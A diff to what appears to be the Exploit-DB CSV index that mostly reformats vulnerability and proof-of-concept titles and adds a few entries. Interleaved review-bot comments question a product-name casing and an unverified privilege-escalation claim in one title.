-22119,platforms/windows/dos/22119.html,"Microsoft PoCket Internet Explorer 3.0 - Denial of Service",2003-01-03,"Christopher Sogge Røtnes",windows,dos,0
+22119,platforms/windows/dos/22119.html,"Microsoft Pocket Internet Explorer 3.0 - Denial of Service",2003-01-03,"Christopher Sogge Røtnes",windows,dos,0
 22121,platforms/windows/dos/22121.pl,"EType EServ 2.9x - FTP Remote Denial of Service",2003-01-04,D4rkGr3y,windows,dos,0
 22122,platforms/windows/dos/22122.pl,"EType EServ 2.9x - POP3 Remote Denial of Service",2003-01-04,D4rkGr3y,windows,dos,0
 22123,platforms/windows/dos/22123.pl,"EType EServ 2.9x - SMTP Remote Denial of Service",2003-01-04,D4rkGr3y,windows,dos,0
@@ -3213,7 +3215,7 @@ id,file,description,date,author,platform,type,port
 24468,platforms/windows/dos/24468.pl,"KMPlayer - Denial of Service",2013-02-10,Jigsaw,windows,dos,0
 24511,platforms/windows/dos/24511.txt,"SAP NetWeaver Message Server - Multiple Vulnerabilities",2013-02-17,"Core Security",windows,dos,0
 24474,platforms/windows/dos/24474.py,"Schneider Electric Accutech Manager - Heap Overflow (PoC)",2013-02-10,"Evren Yalçın",windows,dos,0
-24485,platforms/windows/dos/24485.txt,"Microsoft Windows - HWND_BROADCAST PoC (MS13-005)",2013-02-11,0vercl0k,windows,dos,0
+24485,platforms/windows/dos/24485.txt,"Microsoft Windows - HWND_BROADCAST (PoC) (MS13-005)",2013-02-11,0vercl0k,windows,dos,0
 24486,platforms/multiple/dos/24486.txt,"Google Chrome - Silent HTTP Authentication",2013-02-11,T355,multiple,dos,0
 24487,platforms/linux/dos/24487.py,"cURL - Buffer Overflow",2013-02-11,Volema,linux,dos,0
 24556,platforms/windows/dos/24556.py,"Hanso Player 2.1.0 - '.m3u' Buffer Overflow",2013-03-01,metacom,windows,dos,0
@@ -3741,7 +3743,7 @@ id,file,description,date,author,platform,type,port
 29618,platforms/windows/dos/29618.c,"News File Grabber 4.1.0.1 - Subject Line Stack Buffer Overflow (2)",2007-02-19,Marsu,windows,dos,0
 29620,platforms/osx/dos/29620.txt,"Apple Mac OSX 10.4.8 - ImageIO GIF Image Integer Overflow",2007-02-20,"Tom Ferris",osx,dos,0
 29671,platforms/windows/dos/29671.txt,"Avira Secure Backup 1.0.0.1 Build 3616 - '.reg' Buffer Overflow",2013-11-18,"Julien Ahrens",windows,dos,0
-29791,platforms/windows/dos/29791.pl,"Boilsoft RM TO MP3 Converter 1.72 - '.wav' Crash PoC",2013-11-23,"Akin Tosunlar",windows,dos,0
+29791,platforms/windows/dos/29791.pl,"Boilsoft RM TO MP3 Converter 1.72 - '.wav' Crash (PoC)",2013-11-23,"Akin Tosunlar",windows,dos,0
 29659,platforms/windows/dos/29659.pl,"Microsoft Windows XP/2003 - Explorer .WMF File Handling Denial of Service",2007-02-25,sehato,windows,dos,0
 29660,platforms/windows/dos/29660.txt,"Microsoft Office 2003 - Denial of Service",2007-02-25,sehato,windows,dos,0
 29664,platforms/windows/dos/29664.txt,"Microsoft Publisher 2007 - Remote Denial of Service",2007-02-26,"Tom Ferris",windows,dos,0
@@ -3800,14 +3802,14 @@ id,file,description,date,author,platform,type,port
 30091,platforms/linux/dos/30091.py,"OpenOffice 2.2 Writer Component - Remote Denial of Service",2007-05-28,shinnai,linux,dos,0
 30104,platforms/windows/dos/30104.nasl,"F-Secure Policy Manager 7.00 - 'FSMSH.dll' Remote Denial of Service",2007-05-30,"David Maciejak",windows,dos,0
 30193,platforms/windows/dos/30193.html,"Apple Safari 3.0.1 for Windows - 'Corefoundation.dll' Denial of Service",2007-06-16,Lostmon,windows,dos,0
-30194,platforms/windows/dos/30194.txt,"Apple Safari 3 for Windows - Document.Location Denial of Service",2007-06-16,azizov,windows,dos,0
+30194,platforms/windows/dos/30194.txt,"Apple Safari 3 for Windows - 'Document.Location' Denial of Service",2007-06-16,azizov,windows,dos,0
 30224,platforms/windows/dos/30224.py,"Ingress Database Server 2.6 - Multiple Remote Vulnerabilities",2007-06-21,anonymous,windows,dos,0
 30233,platforms/windows/dos/30233.pl,"LiteWEB Web Server 2.7 - Invalid Page Remote Denial of Service",2007-06-25,Prili,windows,dos,0
 30251,platforms/linux/dos/30251.c,"GD Graphics Library 2.0.34 - (libgd) gdImageCreateXbm Function Unspecified Denial of Service",2007-06-26,anonymous,linux,dos,0
 30252,platforms/windows/dos/30252.py,"Conti FTP Server 1.0 - Large String Denial of Service",2007-06-27,35c666,windows,dos,0
 30255,platforms/windows/dos/30255.txt,"PC SOFT WinDEV 11 - WDP File Parsing Stack Buffer Overflow",2007-06-28,"Jerome Athias",windows,dos,0
 40743,platforms/windows/dos/40743.html,"VBScript 5.8.7600.16385 / 5.8.9600.16384 - RegExpComp::PnodeParse Out-of-Bounds Read",2016-11-09,Skylined,windows,dos,0
-30308,platforms/windows/dos/30308.py,"PotPlayer 1.5.42509 Beta - Denial of Service (Integer Division by Zero Exploit)",2013-12-15,sajith,windows,dos,0
+30308,platforms/windows/dos/30308.py,"PotPlayer 1.5.42509 Beta - Integer Division by Zero Denial of Service",2013-12-15,sajith,windows,dos,0
 30314,platforms/windows/dos/30314.txt,"Yahoo! Messenger 8.1 - Address Book Remote Buffer Overflow",2007-07-16,"Rajesh Sethumadhavan",windows,dos,0
 30791,platforms/multiple/dos/30791.txt,"I Hear U 0.5.6 - Multiple Remote Denial of Service Vulnerabilities",2007-11-19,"Luigi Auriemma",multiple,dos,0
 30395,platforms/php/dos/30395.txt,"PHP openssl_x509_parse() - Memory Corruption",2013-12-17,"Stefan Esser",php,dos,0
@@ -3876,7 +3878,7 @@ id,file,description,date,author,platform,type,port
 30763,platforms/linux/dos/30763.php,"KDE Konqueror 3.5.6 - Cookie Handling Denial of Service",2007-11-14,"laurent gaffie",linux,dos,0
 40602,platforms/windows/dos/40602.html,"Microsoft Edge - 'Array.map' Heap Overflow (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
 30766,platforms/linux/dos/30766.c,"GNU TAR 1.15.91 / CPIO 2.5.90 - safer_name_suffix Remote Denial of Service",2007-11-14,"Dmitry V. Levin",linux,dos,0
-30767,platforms/windows/dos/30767.html,"Apple Safari 3.0.x - for Windows Document.Location.Hash Buffer Overflow",2007-06-25,"Azizov E",windows,dos,0
+30767,platforms/windows/dos/30767.html,"Apple Safari 3.0.x for Windows - 'Document.Location.Hash' Buffer Overflow",2007-06-25,"Azizov E",windows,dos,0
 40604,platforms/windows/dos/40604.html,"Microsoft Edge - 'Array.join' Infomation Leak (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
 30776,platforms/linux/dos/30776.txt,"LIVE555 Media Server 2007.11.1 - ParseRTSPRequestString Remote Denial of Service",2007-11-19,"Luigi Auriemma",linux,dos,0
 30779,platforms/multiple/dos/30779.txt,"Rigs of Rods 0.33d - Long Vehicle Name Buffer Overflow",2007-11-19,"Luigi Auriemma",multiple,dos,0
@@ -3924,7 +3926,7 @@ id,file,description,date,author,platform,type,port
 31148,platforms/multiple/dos/31148.txt,"Opium OPI Server and CyanPrintIP - Format String / Denial of Service",2008-02-11,"Luigi Auriemma",multiple,dos,0
 31150,platforms/multiple/dos/31150.txt,"RPM Remote Print Manager 4.5.1 - Service Remote Buffer Overflow",2008-02-11,"Luigi Auriemma",multiple,dos,0
 31306,platforms/hardware/dos/31306.txt,"Nortel UNIStim IP Phone - Remote Ping Denial of Service",2008-02-26,sipherr,hardware,dos,0
-31307,platforms/android/dos/31307.py,"Android Web Browser - GIF File Heap Based Buffer Overflow",2008-03-04,"Alfredo Ortega",android,dos,0
+31307,platforms/android/dos/31307.py,"Google Android Web Browser - '.GIF' File Heap Based Buffer Overflow",2008-03-04,"Alfredo Ortega",android,dos,0
 31168,platforms/windows/dos/31168.pl,"NCH Software Express Burn Plus 4.68 - '.EBP' Project File Buffer Overflow",2014-01-24,LiquidWorm,windows,dos,0
 31176,platforms/windows/dos/31176.html,"MW6 Technologies Aztec ActiveX - (Data parameter) Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0
 31177,platforms/windows/dos/31177.html,"MW6 Technologies Datamatrix ActiveX - (Data Parameter) - Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0
@@ -3946,7 +3948,7 @@ id,file,description,date,author,platform,type,port
 31300,platforms/windows/dos/31300.txt,"Surgemail and WebMail 3.0 - 'Page' Command Remote Format String",2008-02-25,"Luigi Auriemma",windows,dos,0
 31301,platforms/windows/dos/31301.txt,"Surgemail 3.0 - Real CGI executables Remote Buffer Overflow",2008-02-25,"Luigi Auriemma",windows,dos,0
 31302,platforms/windows/dos/31302.txt,"SurgeFTP 2.3a2 - 'Content-Length' Parameter Null Pointer Denial of Service",2008-02-25,"Luigi Auriemma",windows,dos,0
-31308,platforms/android/dos/31308.html,"Android Web Browser - BMP File Integer Overflow",2008-03-04,"Alfredo Ortega",android,dos,0
+31308,platforms/android/dos/31308.html,"Google Android Web Browser - '.BMP' File Integer Overflow",2008-03-04,"Alfredo Ortega",android,dos,0
 31310,platforms/windows/dos/31310.txt,"Trend Micro OfficeScan - Buffer Overflow / Denial of Service",2008-02-27,"Luigi Auriemma",windows,dos,0
 31323,platforms/windows/dos/31323.c,"ADI Convergence Galaxy FTP Server Password - Remote Denial of Service",2008-03-01,"Maks M",windows,dos,0
 31327,platforms/multiple/dos/31327.txt,"Borland StarTeam 2008 10.0.57 - Multiple Remote Vulnerabilities",2008-03-03,"Luigi Auriemma",multiple,dos,0
@@ -4013,7 +4015,7 @@ id,file,description,date,author,platform,type,port
 31884,platforms/hardware/dos/31884.txt,"Linksys WRH54G 1.1.3 - (Wireless-G Router) Malformed HTTP Request Denial of Service",2008-06-05,dubingyao,hardware,dos,0
 31889,platforms/novell/dos/31889.pl,"Novell Groupwise Messenger 2.0 Client - Buffer Overflow",2008-07-02,"Francisco Amato",novell,dos,0
 31899,platforms/windows/dos/31899.txt,"VideoLAN VLC Media Player 2.1.3 - '.avs' Crash (PoC)",2014-02-25,kw4,windows,dos,0
-31914,platforms/windows/dos/31914.pl,"Gold MP4 Player 3.3 - Buffer Overflow PoC (SEH)",2014-02-26,"Gabor Seljan",windows,dos,0
+31914,platforms/windows/dos/31914.pl,"Gold MP4 Player 3.3 - Buffer Overflow (PoC) (SEH)",2014-02-26,"Gabor Seljan",windows,dos,0
 31915,platforms/linux/dos/31915.py,"GoAhead Web Server 3.1.x - Denial of Service",2014-02-26,"Alaeddine MESBAHI",linux,dos,80
 31919,platforms/multiple/dos/31919.c,"S.T.A.L.K.E.R. 1.0.06 - Remote Denial of Service",2008-06-15,"Luigi Auriemma",multiple,dos,0
 31931,platforms/multiple/dos/31931.txt,"Crysis 1.21 - HTTP/XML-RPC Service Remote Denial of Service",2008-06-16,"Luigi Auriemma",multiple,dos,0
@@ -4091,7 +4093,7 @@ id,file,description,date,author,platform,type,port
 32550,platforms/windows/dos/32550.html,"Microsoft DebugDiag 1.0 - 'CrashHangExt.dll' ActiveX Control Remote Denial of Service",2008-10-30,suN8Hclf,windows,dos,0
 32551,platforms/linux/dos/32551.txt,"Dovecot 1.1.x - Invalid Message Address Parsing Denial of Service",2008-10-30,anonymous,linux,dos,0
 32572,platforms/windows/dos/32572.txt,"Anti-Trojan Elite 4.2.1 - 'Atepmon.sys' IOCTL Request Local Overflow",2008-11-07,alex,windows,dos,0
-32573,platforms/windows/dos/32573.txt,"Microsoft Windows Server 2003/Vista - 'UnhookWindowsHookEx' Local Denial of Service",2008-11-09,killprog.org,windows,dos,0
+32573,platforms/windows/dos/32573.txt,"Microsoft Windows Vista/2003 - 'UnhookWindowsHookEx' Local Denial of Service",2008-11-09,killprog.org,windows,dos,0
 32581,platforms/multiple/dos/32581.txt,"Zope 2.11.2 - PythonScript Multiple Remote Denial of Service Vulnerabilities",2008-11-12,"Marc-Andre Lemburg",multiple,dos,0
 32583,platforms/hardware/dos/32583.txt,"Netgear WGR614 - Administration Interface Remote Denial of Service",2008-11-13,sr.,hardware,dos,0
 32587,platforms/windows/dos/32587.txt,"VeryPDF PDFView - ActiveX Component Heap Buffer Overflow",2008-11-15,r0ut3r,windows,dos,0
@@ -4271,7 +4273,7 @@ id,file,description,date,author,platform,type,port
 33819,platforms/windows/dos/33819.txt,"McAfee Email Gateway < 6.7.2 Hotfix 2 - Multiple Vulnerabilities",2010-04-06,"Nahuel Grisolia",windows,dos,0
 33849,platforms/windows/dos/33849.txt,"netKar PRO 1.1 - '.nkuser' File Creation Null Pointer Denial of Service",2014-06-13,"A reliable source",windows,dos,0
 33850,platforms/linux/dos/33850.txt,"memcached 1.4.2 - Memory Consumption Remote Denial of Service",2010-04-27,fallenpegasus,linux,dos,0
-33860,platforms/windows/dos/33860.html,"Microsoft Internet Explorer 8 / 9 / 10 - CInput Use-After-Free Crash PoC (MS14-035)",2014-06-24,"Drozdova Liudmila",windows,dos,0
+33860,platforms/windows/dos/33860.html,"Microsoft Internet Explorer 8 / 9 / 10 - CInput Use-After-Free Crash (PoC) (MS14-035)",2014-06-24,"Drozdova Liudmila",windows,dos,0
 34145,platforms/unix/dos/34145.txt,"Python 3.2 - 'audioop' Module Memory Corruption",2010-06-14,haypo,unix,dos,0
 33876,platforms/multiple/dos/33876.c,"NovaSTOR NovaNET 11.0 - Remote Denial of Service / Arbitrary memory read",2007-09-14,mu-b,multiple,dos,0
 33879,platforms/multiple/dos/33879.c,"NovaSTOR NovaNET/NovaBACKUP 13.0 - Remote Denial of Service",2007-10-02,mu-b,multiple,dos,0
@@ -4289,7 +4291,7 @@ id,file,description,date,author,platform,type,port
 33951,platforms/windows/dos/33951.txt,"Baidu Spark Browser 26.5.9999.3511 - Remote Stack Overflow (Denial of Service)",2014-07-02,LiquidWorm,windows,dos,0
 33973,platforms/windows/dos/33973.pl,"Hyplay 1.2.0326.1 - '.asx' Remote Denial of Service",2010-05-10,"Steve James",windows,dos,0
 33977,platforms/windows/dos/33977.txt,"Torque Game Engine - Multiple Denial of Service Vulnerabilities",2010-05-09,"Luigi Auriemma",windows,dos,0
-34010,platforms/win_x86/dos/34010.html,"Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free and Memory Corruption PoC (MS14-035)",2014-07-08,"Drozdova Liudmila",win_x86,dos,0
+34010,platforms/win_x86/dos/34010.html,"Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free and Memory Corruption (PoC) (MS14-035)",2014-07-08,"Drozdova Liudmila",win_x86,dos,0
 34027,platforms/solaris/dos/34027.txt,"Sun Solaris 10 - Nested Directory Tree Local Denial of Service",2010-05-21,"Maksymilian Arciemowicz",solaris,dos,0
 34028,platforms/solaris/dos/34028.txt,"Sun Solaris 10 - 'in.ftpd' Long Command Handling Security",2010-05-21,"Maksymilian Arciemowicz",solaris,dos,0
 34051,platforms/windows/dos/34051.py,"Core FTP Server 1.0.343 - Directory Traversal",2010-05-28,"John Leitch",windows,dos,0
@@ -4339,7 +4341,7 @@ id,file,description,date,author,platform,type,port
 34428,platforms/windows/dos/34428.py,"Quintessential Media Player 5.0.121 - '.m3u' Buffer Overflow",2010-08-09,"Abhishek Lyall",windows,dos,0
 34442,platforms/windows/dos/34442.html,"Kylinsoft InstantGet 2.08 - ActiveX Control 'ShowBar' Method Buffer Overflow",2009-09-19,the_Edit0r,windows,dos,0
 34457,platforms/multiple/dos/34457.txt,"Sniper Elite 1.0 - Null Pointer Dereference Denial of Service",2009-08-14,"Luigi Auriemma",multiple,dos,0
-34458,platforms/windows/dos/34458.html,"Microsoft Internet Explorer - Memory Corruption PoC (MS14-029)",2014-08-28,PhysicalDrive0,windows,dos,0
+34458,platforms/windows/dos/34458.html,"Microsoft Internet Explorer - Memory Corruption (PoC) (MS14-029)",2014-08-28,PhysicalDrive0,windows,dos,0
 34460,platforms/windows/dos/34460.py,"Sonique 2.0 - '.xpl' Remote Stack Based Buffer Overflow",2010-08-12,"Hamza_hack_dz & Black-liondz1",windows,dos,0
 34463,platforms/windows/dos/34463.py,"HTML Help Workshop 1.4 - Buffer Overflow (SEH)",2014-08-29,"Moroccan Kingdom (MKD)",windows,dos,0
 34480,platforms/windows/dos/34480.py,"Xilisoft Video Converter 3.1.8.0720b - '.ogg' Buffer Overflow",2010-08-16,"Praveen Darshanam",windows,dos,0
@@ -4461,6 +4463,7 @@ id,file,description,date,author,platform,type,port
 35889,platforms/windows/dos/35889.py,"IceCream Ebook Reader 1.41 - Crash (PoC)",2015-01-23,"Kapil Soni",windows,dos,0
 35895,platforms/windows/dos/35895.txt,"RealityServer Web Services RTMP Server 3.1.1 build 144525.5 - Null Pointer Dereference Denial of Service",2011-06-28,"Luigi Auriemma",windows,dos,0
 35913,platforms/android/dos/35913.txt,"Android WiFi-Direct - Denial of Service",2015-01-26,"Core Security",android,dos,0
+35935,platforms/windows/dos/35935.py,"UniPDF 1.1 - Crash (PoC) (SEH)",2015-01-29,bonze,windows,dos,0
 35938,platforms/freebsd/dos/35938.txt,"FreeBSD Kernel - Multiple Vulnerabilities",2015-01-29,"Core Security",freebsd,dos,0
 35939,platforms/hardware/dos/35939.txt,"Alice Modem 1111 - 'rulename' Parameter Cross-Site Scripting / Denial of Service",2011-07-12,"Moritz Naumann",hardware,dos,0
 35951,platforms/linux/dos/35951.py,"Exim ESMTP 4.80 - glibc gethostbyname Denial of Service",2015-01-29,1n3,linux,dos,0
@@ -4496,6 +4499,7 @@ id,file,description,date,author,platform,type,port
 36377,platforms/multiple/dos/36377.txt,"CoDeSys 3.4 - HTTP POST Request Null Pointer Content-Length Parsing Remote Denial of Service",2011-11-30,"Luigi Auriemma",multiple,dos,0
 36378,platforms/multiple/dos/36378.txt,"CoDeSys 3.4 - Null Pointer Invalid HTTP Request Parsing Remote Denial of Service",2011-11-30,"Luigi Auriemma",multiple,dos,0
 36405,platforms/windows/dos/36405.txt,"Serv-U FTP Server 11.1.0.3 - Denial of Service / Security Bypass",2011-12-05,"Luigi Auriemma",windows,dos,0
+36388,platforms/linux/dos/36388.py,"Brasero CD/DVD Burner 3.4.1 - '.m3u' Buffer Overflow Crash (PoC)",2015-03-16,"Avinash Thapa",linux,dos,0
 36392,platforms/windows/dos/36392.txt,"Intel Network Adapter Diagnostic Driver - IOCTL Handling",2015-03-14,"Glafkos Charalambous",windows,dos,0
 36403,platforms/windows/dos/36403.html,"HP Device Access Manager for HP ProtectTools 5.0/6.0 - Heap Memory Corruption",2011-12-02,"High-Tech Bridge SA",windows,dos,0
 36404,platforms/linux/dos/36404.c,"GNU glibc - Timezone Parsing Remote Integer Overflow",2009-06-01,dividead,linux,dos,0
@@ -4516,13 +4520,14 @@ id,file,description,date,author,platform,type,port
 36682,platforms/php/dos/36682.php,"PHP PDORow Object - Remote Denial of Service",2011-09-24,anonymous,php,dos,0
 36741,platforms/lin_x86/dos/36741.py,"Samba < 3.6.2 (x86) - Denial of Service (PoC)",2015-04-13,sleepya,lin_x86,dos,0
 36743,platforms/linux/dos/36743.c,"Linux Kernel 3.13 / 3.14 (Ubuntu) - 'splice()' System Call Local Denial of Service",2015-04-13,"Emeric Nasi",linux,dos,0
-36773,platforms/windows/dos/36773.c,"Microsoft Windows - 'HTTP.sys' PoC (MS15-034)",2015-04-15,rhcp011235,windows,dos,0
+36773,platforms/windows/dos/36773.c,"Microsoft Windows - 'HTTP.sys' (PoC) (MS15-034)",2015-04-15,rhcp011235,windows,dos,0
 36776,platforms/windows/dos/36776.py,"Microsoft Windows - 'HTTP.sys' HTTP Request Parsing Denial of Service (MS15-034)",2015-04-16,"laurent gaffie",windows,dos,80
 36788,platforms/windows/dos/36788.txt,"Oracle - Outside-In '.DOCX' File Parsing Memory Corruption",2015-04-17,"Francis Provencher",windows,dos,0
 36789,platforms/php/dos/36789.php,"PHP 5.3.8 - Remote Denial of Service",2011-12-18,anonymous,php,dos,0
 36814,platforms/osx/dos/36814.c,"Apple Mac OSX - Local Denial of Service",2015-04-21,"Maxime Villard",osx,dos,0
 36825,platforms/hardware/dos/36825.php,"ZYXEL P-660HN-T1H_IPv6 - Remote Configuration Editor / Web Server Denial of Service",2015-04-23,"Koorosh Ghorbani",hardware,dos,80
 36840,platforms/multiple/dos/36840.py,"Wireshark 1.12.4 - Memory Corruption and Access Violation (PoC)",2015-04-27,"Avinash Thapa",multiple,dos,0
+36841,platforms/windows/dos/36841.py,"UniPDF 1.2 - 'xml' Buffer Overflow Crash (PoC)",2015-04-27,"Avinash Thapa",windows,dos,0
 36847,platforms/windows/dos/36847.py,"i.FTP 2.21 - SEH Overflow Crash (PoC)",2015-04-28,"Avinash Thapa",windows,dos,0
 36868,platforms/hardware/dos/36868.pl,"Mercury MR804 Router - Multiple HTTP Header Fields Denial of Service Vulnerabilities",2012-02-21,demonalex,hardware,dos,0
 36869,platforms/multiple/dos/36869.txt,"IBM solidDB 6.5.0.8 - 'SELECT' Statement 'WHERE' Condition Denial of Service",2012-02-09,IBM,multiple,dos,0
@@ -4545,7 +4550,7 @@ id,file,description,date,author,platform,type,port
 37188,platforms/windows/dos/37188.txt,"WebDrive 12.2 (B4172) - Buffer Overflow",2015-06-03,Vulnerability-Lab,windows,dos,0
 37199,platforms/hardware/dos/37199.txt,"ZTE AC 3633R USB Modem - Multiple Vulnerabilities",2015-06-04,Vishnu,hardware,dos,0
 37218,platforms/jsp/dos/37218.txt,"Atlassian Tempo 6.4.3 / JIRA 5.0.0 / Gliffy 3.7.0 - XML Parsing Denial of Service",2012-05-17,anonymous,jsp,dos,0
-37239,platforms/windows/dos/37239.html,"Microsoft Internet Explorer 11 - Crash PoC (2)",2015-06-08,"Pawel Wylecial",windows,dos,0
+37239,platforms/windows/dos/37239.html,"Microsoft Internet Explorer 11 - Crash (PoC) (2)",2015-06-08,"Pawel Wylecial",windows,dos,0
 37249,platforms/linux/dos/37249.py,"Libmimedir - '.VCF' Memory Corruption (PoC)",2015-06-10,"Jeremy Brown",linux,dos,0
 37299,platforms/windows/dos/37299.py,"XtMediaPlayer 0.93 - '.wav' Crash (PoC)",2015-06-16,"SATHISH ARTHAR",windows,dos,0
 37300,platforms/windows/dos/37300.py,"FinePlayer 2.20 - '.mp4' Crash (PoC)",2015-06-16,"SATHISH ARTHAR",windows,dos,0
@@ -5425,7 +5430,7 @@ id,file,description,date,author,platform,type,port
 41668,platforms/multiple/dos/41668.txt,"APNGDis 2.8 - 'chunk size descriptor' Heap Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0
 41669,platforms/multiple/dos/41669.txt,"APNGDis 2.8 - 'image width / height chunk' Heap Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0
 41670,platforms/multiple/dos/41670.txt,"APNGDis 2.8 - 'filename' Stack Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0
-41778,platforms/multiple/dos/41778.cc,"Apple macOS/IOS 10.12.2(16C67) - mach_msg Heap Overflow",2017-03-30,"Google Security Research",multiple,dos,0
+41778,platforms/multiple/dos/41778.cc,"Apple macOS/IOS 10.12.2 (16C67) - 'mach_msg' Heap Overflow",2017-03-30,"Google Security Research",multiple,dos,0
 41715,platforms/linux/dos/41715.txt,"wifirxpower - Local Buffer Overflow",2017-03-23,"Nassim Asrir",linux,dos,0
 41734,platforms/windows/dos/41734.c,"Microsoft Visual Studio 2015 update 3 - Denial of Service",2017-03-26,"Peter Baris",windows,dos,0
 41737,platforms/windows/dos/41737.txt,"Disk Sorter Enterprise 9.5.12 - Local Buffer Overflow",2017-03-27,"Nassim Asrir",windows,dos,0
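Review bot: The rewritten 41778 title still spells the Apple product as "IOS" while this line is being touched for spacing and quoting; the name is iOS, so the row should read `"Apple macOS/iOS 10.12.2 (16C67) - 'mach_msg' Heap Overflow"`. A single version and build string following "macOS/iOS" also leaves it unclear whether the entry covers iOS at all, which this page cannot confirm — worth checking against the entry before the title asserts both platforms.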
@@ -5724,7 +5729,7 @@ id,file,description,date,author,platform,type,port
 1465,platforms/windows/local/1465.c,"Microsoft Windows - ACLs Privilege Escalation (2)",2006-02-12,"Andres Tarasco",windows,local,0
 1470,platforms/windows/local/1470.c,"Microsoft HTML Help Workshop - '.hhp' Buffer Overflow (1)",2006-02-06,bratax,windows,local,0
 1479,platforms/qnx/local/1479.sh,"QNX Neutrino 6.2.1 - (phfont) Race Condition Privilege Escalation",2006-02-08,kokanin,qnx,local,0
-1481,platforms/qnx/local/1481.sh,"QNX RTOS 6.3.0 - Insecure rc.local Permissions Plus System Crash",2006-02-08,kokanin,qnx,local,0
+1481,platforms/qnx/local/1481.sh,"QNX RTOS 6.3.0 - Insecure 'rc.local' Permissions System Crash / Privilege Escalation",2006-02-08,kokanin,qnx,local,0
 1490,platforms/windows/local/1490.c,"Microsoft HTML Help Workshop - '.hhp' Buffer Overflow (2)",2006-02-11,k3xji,windows,local,0
 1495,platforms/windows/local/1495.cpp,"Microsoft HTML Help Workshop - '.hhp' Buffer Overflow (3)",2006-02-14,darkeagle,windows,local,0
 1518,platforms/linux/local/1518.c,"MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library Exploit (2)",2006-02-20,"Marco Ivaldi",linux,local,0
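Review bot: The new 1481 title introduces "Privilege Escalation", a claim the previous title ("... Permissions Plus System Crash") did not make, and nothing on this page shows it was verified against the entry; if it was not, the added claim should be dropped rather than left as an unverified impact statement. The qualifiers also now run together without a separator, so the title reads as "Permissions System Crash"; `"QNX RTOS 6.3.0 - Insecure 'rc.local' Permissions / System Crash"` keeps the original meaning and matches the "A / B" form this file already uses (e.g. 36825, 9377).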
@@ -5745,8 +5750,8 @@ id,file,description,date,author,platform,type,port
 1806,platforms/windows/local/1806.c,"IntelliTamper 2.07 - '.map' Local Arbitrary Code Execution (1)",2006-05-19,Devil-00,windows,local,0
 40336,platforms/win_x86-64/local/40336.py,"Navicat Premium 11.2.11 (x64) - Local Database Password Disclosure",2016-09-05,"Yakir Wizman",win_x86-64,local,0
 1831,platforms/linux/local/1831.txt,"tiffsplit (libtiff 3.8.2) - Local Stack Buffer Overflow (PoC)",2006-05-26,nitr0us,linux,local,0
-1910,platforms/windows/local/1910.c,"Microsoft Windows - NtClose DeadLock PoC (MS06-030)",2006-06-14,"Ruben Santamarta",windows,local,0
-1911,platforms/windows/local/1911.c,"Microsoft Windows XP/2000 - 'Mrxsmb.sys' Privilege Escalation PoC (MS06-030)",2006-06-14,"Ruben Santamarta",windows,local,0
+1910,platforms/windows/local/1910.c,"Microsoft Windows - NtClose DeadLock (PoC) (MS06-030)",2006-06-14,"Ruben Santamarta",windows,local,0
+1911,platforms/windows/local/1911.c,"Microsoft Windows XP/2000 - 'Mrxsmb.sys' Privilege Escalation (PoC) (MS06-030)",2006-06-14,"Ruben Santamarta",windows,local,0
 1917,platforms/windows/local/1917.pl,"Pico Zip 4.01 - (Long Filename) Buffer Overflow",2006-06-15,c0rrupt,windows,local,0
 1924,platforms/multiple/local/1924.txt,"Sun iPlanet Messaging Server 5.2 HotFix 1.16 - Root Password Disclosure",2006-06-18,php0t,multiple,local,0
 1944,platforms/windows/local/1944.c,"Microsoft Excel - Unspecified Remote Code Execution",2006-06-22,"naveed afzal",windows,local,0
@@ -5858,7 +5863,7 @@ id,file,description,date,author,platform,type,port
 3429,platforms/windows/local/3429.php,"PHP COM extensions - (inconsistent Win32) Safe_mode Bypass Exploit",2007-03-07,anonymous,windows,local,0
 3431,platforms/windows/local/3431.php,"PHP 4.4.6 - crack_opendict() Local Buffer Overflow (PoC)",2007-03-08,rgod,windows,local,0
 3439,platforms/windows/local/3439.php,"PHP 4.4.6 - snmpget() object id Local Buffer Overflow (PoC)",2007-03-09,rgod,windows,local,0
-3440,platforms/linux/local/3440.php,"PHP 5.2.0 / PHP with PECL ZIP 1.8.3 - zip:// URL Wrapper Buffer Overflow",2007-03-09,"Stefan Esser",linux,local,0
+3440,platforms/linux/local/3440.php,"PHP 5.2.0 / PHP with PECL ZIP 1.8.3 - 'zip://' URL Wrapper Buffer Overflow",2007-03-09,"Stefan Esser",linux,local,0
 3442,platforms/multiple/local/3442.php,"PHP 4.4.6 - cpdf_open() Local Source Code Disclosure (PoC)",2007-03-09,rgod,multiple,local,0
 3451,platforms/win_x86/local/3451.c,"Oracle 10g (Windows x86) - (PROCESS_DUP_HANDLE) Local Privilege Elevation",2007-03-10,"Cesar Cerrudo",win_x86,local,0
 3460,platforms/osx/local/3460.php,"PHP 5.2.0 (OSX) - EXT/Filter Space Trimming Buffer Underflow Exploit",2007-03-12,"Stefan Esser",osx,local,0
@@ -6032,7 +6037,7 @@ id,file,description,date,author,platform,type,port
 7171,platforms/multiple/local/7171.txt,"PHP 5.2.6 - (error_log) Safe_mode Bypass",2008-11-20,SecurityReason,multiple,local,0
 7177,platforms/linux/local/7177.c,"Oracle Database Vault - 'ptrace(2)' Privilege Escalation",2008-11-20,"Jakub Wartak",linux,local,0
 40988,platforms/windows/local/40988.c,"Kaspersky 17.0.0 - Local CA root Incorrectly Protected",2017-01-04,"Google Security Research",windows,local,0
-7264,platforms/windows/local/7264.txt,"Apache Tomcat (Windows) - runtime.getRuntime().exec() Privilege Escalation",2008-11-28,Abysssec,windows,local,0
+7264,platforms/windows/local/7264.txt,"Apache Tomcat (Windows) - 'runtime.getRuntime().exec()' Privilege Escalation",2008-11-28,Abysssec,windows,local,0
 7309,platforms/windows/local/7309.pl,"Cain & Abel 4.9.24 - '.rdp' Stack Overflow",2008-11-30,SkD,windows,local,0
 7313,platforms/linux/local/7313.sh,"Debian - (symlink attack in login) Arbitrary File Ownership (PoC)",2008-12-01,"Paul Szabo",linux,local,0
 7329,platforms/windows/local/7329.py,"Cain & Abel 4.9.23 - '.rdp' Buffer Overflow",2008-12-03,Encrypt3d.M!nd,windows,local,0
